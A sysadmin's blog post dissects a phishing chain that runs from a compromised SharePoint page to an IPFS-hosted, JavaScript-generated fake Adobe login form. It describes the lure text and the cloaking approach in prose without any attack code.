The chain of landing web pages that I saw for a phish spam today

April 12, 2023

Over on the Fediverse, I shared a phish-related discovery:

Today's discovery: people hosting phish landing forms in IPFS and using Cloudflare's IPFS gateway to do the work of web access to them. Nicely played. Everyone is going to point fingers at everyone else.

(As usual the email has a different URL, with a 'this is our secure document link' that takes you to the IPFS hosted form.)

Let's be a little bit more specific, because it's a useful example of just how complicated these things can be.

The email was a 'X has shared a file with you' email with a link to a page on what claimed to be a travel company's Sharepoint aka OneNote site (under '<...>-my.sharepoint.com', which you probably aren't going to be able to block). Based on the URL, this may have been a page created by and for a particular user, instead of a corporate page, meaning that just this user had their Sharepoint access compromised. This page said:

<company> transmitted a secured RFQ itinerary Doc

To view the doc, click the link below

RFQ itinerry

[...]

(The spelling here is authentic.)

That link took you to a cloudflare-ipfs.com URL, which displayed an official looking Adobe 'Verify Your Identity' thing asking you to sign in:

You've received a secure file
[PDF icon] 58.3 Kb

To receive and download this PDF file , please enter specific professional email credentials that this document was sent to.

The contents of this page weren't (visibly) there in the initial HTML page fetched from IPFS; instead, they were created on the fly by encoded Javascript, insuring that simply fetching and examining the IPFS URL would tell you (or a filtering system) nothing. Fortunately browser developer tools can inspect the resulting dynamically created web page to reveal that it had an embedded form that POST'd the results off to a mybluehost.me .php page. Probably this page then sends the results somewhere else, but that was as far as I felt like going.

(On the one hand, this is your web browser clearly asking you to authenticate to see a PDF. On the other hand, Adobe has clouded up all its PDF programs, so sure, why not assume that Adobe runs a secure PDF sharing thing for people as part of that.)

My guess is that this level of indirection and cloaking is typical in modern phish spam attempts. Certainly this particular attempt isn't a top-notch effort, although it was good enough to not be discarded out of hand by people here. The use of IPFS feels creative, though, especially with the actual page contents only being created by Javascript. A somewhat cautious IPFS gateway might try to look for bad things in the web page it's about to serve someone, but I don't think anyone is going to run the web page to be served through a Javascript interpreter (nor should they).

(This uses the same idea of 'you must authenticate to view this PDF' but with more steps than the other recent-ish time I've seen this trick. That this bounces you through a website may make it more plausible to people, since having to authenticate to access things for you on the web is not uncommon. It may raise large red flags to technical people who stop to think about the mechanics, but we're not really the target audience for this attack.)

Written on 12 April 2023.
« Notification sounds and system sounds on Linux should be granular
OpenSSH's (signed) certificates are not TLS X.509 certificates »

Page tools: View Source.
Search:
Login: Password:

Last modified: Wed Apr 12 21:52:50 2023
This dinky wiki is brought to you by the Insane Hackers Guild, Python sub-branch.